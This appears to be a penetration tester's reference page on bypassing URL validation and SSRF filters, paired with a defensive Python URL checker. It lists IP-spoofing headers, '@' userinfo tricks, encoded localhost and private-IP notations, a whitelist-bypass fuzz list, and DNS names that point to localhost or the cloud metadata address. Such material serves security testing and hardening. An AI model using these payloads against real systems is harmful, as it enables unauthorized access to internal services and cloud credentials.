- URL Format Bypass (HackTricks)
- URL Obfuscation With Decimal IP Address
Use the URL validation bypass cheat sheet (PortSwigger)!
IP Spoofing
Test with these HTTP headers to spoof the client IP address seen by the application. See List of HTTP header fields (Wikipedia).
X-Forwarded-For: client1, proxy1, proxy2
X-Forwarded-For: 111.111.111.111
X-Forwarded-For: 111.111.111.111, 222.222.222.222, 333.333.333.333
X-Forwarded-Host: example.com
X-Forwarded-Host: example.com:8080
Forwarded: for=111.111.111.111;proto=http;by=222.222.222.222
Forwarded: for=111.111.111.111, for=222.222.222.222
Bypass domain whitelisting
Goes to the last domain: everything before the @ is parsed as userinfo (credentials), so the request is sent to the host after it.
http://example.com@lisandre.com
https://facebook.com@linkedin.com
nslookup google.com
https://lisandre.com@172.217.13.206
# Decimal bypass: 172.217.13.206 translates to 2899905998 (see IPv4 to decimal)
nslookup google.com
https://lisandre.com@2899905998
# Octal bypass: 172.217.13.206 translates to 025466206716 (see IP to octal)
nslookup google.com
https://lisandre.com@025466206716
Bypass protections on 127.0.0.1 or localhost
- Using an alternative IP representation of 127.0.0.1, such as 2130706433, 017700000001, or 127.1.
- Registering your own domain name that resolves to 127.0.0.1.
- Using other domains that resolve to 127.0.0.1, like http://spoofed.burpcollaborator.net, nip.io or tinyurl.
- Obfuscating blocked strings using URL encoding or case variation.
- To bypass filters on directory names, use double URL encoding (“a” is %61 once encoded and %2561 double encoded), or try changing the case: Admin, aDmin, ADMIN, etc. With the Hackvertor extension in Burp Suite:
<@replace('%','%25')><@urlencode_all>admin<@/urlencode_all><@/replace>
Bypass localhost filters
## Localhost
http://example.com@127.0.0.1
http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22
http://127.1:80
http://0
http://0.0.0.0:80
http://localhost:80
http://[::]:80/
http://[::]:25/ SMTP
http://[::]:3128/ Squid
http://[0000::1]:80/
http://[0:0:0:0:0:ffff:127.0.0.1]/thefile
http://①②⑦.⓪.⓪.⓪
## CIDR bypass (the whole 127.0.0.0/8 range is loopback)
http://127.127.127.127
http://127.0.1.3
http://127.0.0.0
## Decimal bypass, see IPv4 to decimal
http://2130706433/ = http://127.0.0.1
http://3232235521/ = http://192.168.0.1
## Octal bypass, see IP to octal (https://www.browserling.com/tools/ip-to-oct)
http://017700000001 = http://127.0.0.1
## Hexadecimal bypass
127.0.0.1 = 0x7f.0x00.0x00.0x01 = 0x7f000001
http://0x7f000001/ = http://127.0.0.1
http://0xc0a80014/ = http://192.168.0.20
## Domain FUZZ bypass ({domain} is the whitelisted domain; from https://github.com/0x221b/Wordlists/blob/master/Attacks/SSRF/Whitelist-bypass.txt)
http://{domain}@127.0.0.1
http://127.0.0.1#{domain}
http://{domain}.127.0.0.1
http://127.0.0.1/{domain}
http://127.0.0.1/?d={domain}
https://{domain}@127.0.0.1
https://127.0.0.1#{domain}
https://{domain}.127.0.0.1
https://127.0.0.1/{domain}
https://127.0.0.1/?d={domain}
http://{domain}@localhost
http://localhost#{domain}
http://{domain}.localhost
http://localhost/{domain}
http://localhost/?d={domain}
http://127.0.0.1%00{domain}
http://127.0.0.1?{domain}
http://127.0.0.1///{domain}
https://127.0.0.1%00{domain}
https://127.0.0.1?{domain}
https://127.0.0.1///{domain}
DNS directing to localhost
localtest.me = 127.0.0.1
customer1.app.localhost.my.company.127.0.0.1.nip.io = 127.0.0.1
mail.ebc.apple.com = 127.0.0.6 (localhost)
127.0.0.1.nip.io = 127.0.0.1 (Resolves to the given IP)
www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us = Resolves to www.google.com
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
http://bugbounty.dod.network = 127.0.0.2 (localhost)
1ynrnhl.xip.io = 169.254.169.254
spoofed.burpcollaborator.net = 127.0.0.1
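Every notation in the localhost, CIDR, decimal, octal and hex sections above, and every hostname in the DNS list, is just another spelling of the same address, which is why a validator that string-matches "127.0.0.1" or "localhost" fails. The following is an added example, not code from the original page or from any tool it cites: a deny-by-default URL check that canonicalizes the host the way inet_aton does, unwraps IPv4-mapped IPv6 literals, drops userinfo, and resolves names through an injected resolver. `parse_ipv4_literal`, `host_to_ip`, `check_url`, `allowed` and the `FAKE_DNS` table are constructed for this example.

```python
import ipaddress
from urllib.parse import urlsplit

def parse_ipv4_literal(host):
    # inet_aton semantics: 1-4 dot-separated parts, each decimal, octal (leading 0)
    # or hex (0x); the last part fills the remaining bytes. None if not a literal.
    values = []
    for p in host.split("."):
        if not (p.isascii() and p.isalnum()):
            return None
        base = 16 if p[:2].lower() == "0x" else 8 if len(p) > 1 and p[0] == "0" else 10
        try:
            values.append(int(p[2:] if base == 16 else p, base))
        except ValueError:
            return None
    *head, last = values
    if len(head) > 3 or any(v > 255 for v in head) or last >= 256 ** (4 - len(head)):
        return None
    for i, v in enumerate(reversed(head)):
        last |= v << (8 * (4 - len(head) + i))
    return ipaddress.IPv4Address(last)

def host_to_ip(host):
    # IPv4 in any notation, an IPv6 literal, or [::ffff:a.b.c.d] unwrapped; else None.
    ip = parse_ipv4_literal(host)
    try:
        ip = ip if ip is not None else ipaddress.ip_address(host)
    except ValueError:
        return None
    return getattr(ip, "ipv4_mapped", None) or ip

def check_url(url, resolve):
    # Deny by default. resolve(name) -> list of IP strings; injected so this runs
    # offline and so the caller can pin the returned address for the real connection
    # (otherwise a rebinding resolver passes here and answers 127.0.0.1 later).
    parts = urlsplit(url)  # raises ValueError on a malformed URL: fail closed
    host = parts.hostname  # userinfo (user@host) and IPv6 brackets are stripped
    if parts.scheme not in ("http", "https") or not host:
        return False, "scheme or host not allowed"
    ip = host_to_ip(host)
    targets = [ip] if ip is not None else [host_to_ip(a) for a in resolve(host)]
    if not targets or any(t is None or not t.is_global for t in targets):
        return False, f"{host} -> {targets}: not a public address"
    return True, f"{host} -> {targets[0]}"

# Constructed stand-in for DNS mirroring the page's examples (no real lookups).
FAKE_DNS = {"localtest.me": ["127.0.0.1"], "127.0.0.1.nip.io": ["127.0.0.1"],
            "1ynrnhl.xip.io": ["169.254.169.254"], "example.com": ["93.184.216.34"]}
def allowed(url):
    return check_url(url, lambda name: FAKE_DNS.get(name, []))[0]
```

Unicode digit forms such as ①②⑦.⓪.⓪.⓪ are neither a parseable literal nor a resolvable name here, so they are refused rather than guessed at.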
DNS interaction
If you receive a DNS request in Burp Collaborator, try HTTP on the DNS port.
http://<burp collaborator ID>:53/
nip.io
Wildcard DNS for any IP address. Stop editing your /etc/hosts file with custom hostname and IP address mappings. Will add an Origin HTTP header to HTTP requests.
Example with Amazon S3 bucket
http://s3-eu-west-1.amazonaws.com/<bucket_name>/.nip.io
Examples
nip.io allows you to do that by mapping any IP Address to a hostname using the following formats:
10.0.0.1.nip.io maps to 10.0.0.1
192-168-1-250.nip.io maps to 192.168.1.250
app.10.8.0.1.nip.io maps to 10.8.0.1
app-37-247-48-68.nip.io maps to 37.247.48.68
customer1.app.10.0.0.1.nip.io maps to 10.0.0.1
customer2-app-127-0-0-1.nip.io maps to 127.0.0.1
nip.io maps <anything>[.-]<IP Address>.nip.io in either “dot” or “dash” notation to the corresponding <IP Address>:
dot notation: magic.127.0.0.1.nip.io
dash notation: magic-127-0-0-1.nip.io
The “dash” notation is especially useful when using services like Let's Encrypt, as it is just a regular sub-domain of nip.io.